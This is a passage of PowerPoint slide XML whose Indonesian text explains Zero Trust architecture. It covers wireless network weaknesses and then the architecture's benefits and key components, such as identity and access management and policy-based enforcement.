            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (Wi-Fi)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Manfaat Utama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Zero Trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik-Mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik-Menyertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>batasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik-Membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>granularitas-Memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>butuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Zero Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemahaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyeluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguraikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Zero Trust:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir-Mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IAM)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penegakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan-Membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
